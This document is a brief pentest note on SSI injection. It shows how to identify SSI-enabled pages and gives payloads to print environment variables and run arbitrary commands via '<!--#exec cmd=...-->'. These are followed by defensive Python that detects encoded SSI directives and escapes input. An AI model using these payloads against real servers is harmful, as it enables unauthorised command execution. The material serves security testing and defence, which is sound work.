SSI (EXPLOITATION)

#identification of SSI usage
 * the file extensions .shtml, .shtm, and .stm indicate that the page may support SSI
 * if user input is inserted into the page without prior sanitization, the page might be vulnerable to SSI injection

root@oco:~$ BROWSER > {targetSite:port}
 input field: <!--#printenv -->
 * this directive displays the environment variables

#execute arbitrary cmds 
root@oco:~$ BROWSER > {targetSite:port}
 input field: <!--#exec cmd="id" -->
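
Defensive counterpart to the two input-field checks above (added example, not part of the original notes): flag SSI directives in request values, including URL-encoded and double-encoded ones, and HTML-encode input before it is written into an SSI-parsed page. The function names and sample values are constructed for illustration.

```python
import html
import re
from urllib.parse import unquote_plus

# An SSI directive opens with "<!--#" followed by the directive name
# (printenv, exec, include, ...). Optional whitespace is tolerated for detection.
SSI_DIRECTIVE = re.compile(r"<!--#\s*([a-z]+)", re.IGNORECASE)


def decode_layers(value, max_rounds=3):
    """URL-decode repeatedly so a double-encoded '<' (%253C) is also seen."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_ssi_directives(value):
    """Return the lower-cased SSI directive names found in a request value."""
    return [name.lower() for name in SSI_DIRECTIVE.findall(decode_layers(value))]


def render_safe(value):
    """HTML-encode user input so '<!--#' never reaches the SSI parser literally."""
    return html.escape(value, quote=True)


# Constructed sample request values (hypothetical, not from the original page).
SAMPLES = [
    "name=alice",
    "name=<!--#printenv -->",
    "name=%3C!--%23exec+cmd%3D%22id%22+--%3E",
    "name=%253C!--%2523printenv%2520--%253E",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        hits = find_ssi_directives(sample)
        print(f"{'ALERT' if hits else 'ok':5} {hits} {sample}")
    print(render_safe('<!--#exec cmd="id" -->'))
```

On Apache, `Options IncludesNOEXEC` additionally disables the exec directive for pages that still need SSI.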
